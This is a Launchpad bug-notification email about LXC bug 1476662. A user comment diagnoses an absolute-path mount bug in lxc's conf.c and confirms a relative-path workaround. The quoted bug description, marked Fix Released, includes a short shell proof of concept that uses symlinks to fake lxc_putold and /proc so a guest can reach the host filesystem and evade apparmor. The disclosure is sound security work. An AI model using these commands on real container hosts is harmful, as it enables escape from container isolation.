touch-packages team mailing list archive
-
touch-packages team
-
Mailing list archive
-
Message #107531
[Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
I have a similar problem (but not with /proc).
***Roman Fielder's link (above) suggests the correct work around.***
My lxc configuration file has the following line:
> lxc.mount.entry = /data/references
/var/lib/lxc/noteServer/rootfs/data/references none ro,bind 0 0
(Note that the mount directory is an **absolute** path)
My resulting error message (in /var/log/lxc/noteServer.log) is:
> lxc-start 1443599663.225 ERROR lxc_utils -
utils.c:ensure_not_symlink:1384 - Mount onto /usr/lib/x86_64-linux-
gnu/lxc//data/references resulted in /usr/lib/x86_64-linux-
gnu/lxc/data/references
Tracing through the apt-get source lxc code I think the offending code
(in the mount_entry_on_absolute_rootfs function in the
lxc-1.0.7/src/lxc/conf.c file) is:
> aux = strstr(mntent->mnt_dir, path);
> if (aux) {
> offset = strlen(path);
> goto skipabs;
> }
>
>skipvarlib:
> aux = strstr(mntent->mnt_dir, rootfs->path);
> if (!aux) {
> WARN("ignoring mount point '%s'", mntent->mnt_dir);
> goto out;
> }
> offset = strlen(rootfs->path);
>
>skipabs:
>
> r = snprintf(path, MAXPATHLEN, "%s/%s", rootfs->mount,
> aux + offset);
Note that the last line should (probably -- I have not compiled any code
to test this) be:
> r = snprintf(path, MAXPATHLEN, "%s/%s", rootfs->mount,
> aux + offset + 1);
The "+1" then skips over the "/" in the mntent->mnt_dir so there will
only be *one* "/" in the resulting path.
Note that the work around in Roman Fiedler's link ensures that the mount
entry uses the mount_entry_on_relative_rootfs function (which works)
rather than the (currently broken?) mount_entry_on_absolute_rootfs
function.
I can confirm that the following configuration line:
> lxc.mount.entry = /data/references data/references none ro,bind 0 0
now in fact works, since it specifies a **relative** mount directory and
so invokes the mount_entry_on_relative_rootfs function.
Many thanks for excellent **open source** tools!
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1476662
Title:
lxc-start symlink vulnerabilities may allow guest to read host
filesystem, interfere with apparmor
Status in lxc package in Ubuntu:
Fix Released
Bug description:
lxc-start shuffles around mounts using helper directory
/usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here)
It then modifies mounts operating in guest root directory before
invoking init. As it does not check if all mount points are
directories, a malicious guest may modify its internal structure
before shutdown (or was created using manipulated image) and then when
started again, guest may
* Access the whole host root filesystem
* Block switching from lxc-start apparmor profile to lxc-container-
default
# Real putold before pivot-root (root fs will end here)
mkdir -p /x/lxc_putold
# Faked putold
ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts
# proc fake
mkdir -p /x/proc
umount /proc
rmdir /proc
ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc
mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self
touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status
The issue was also found during
https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions
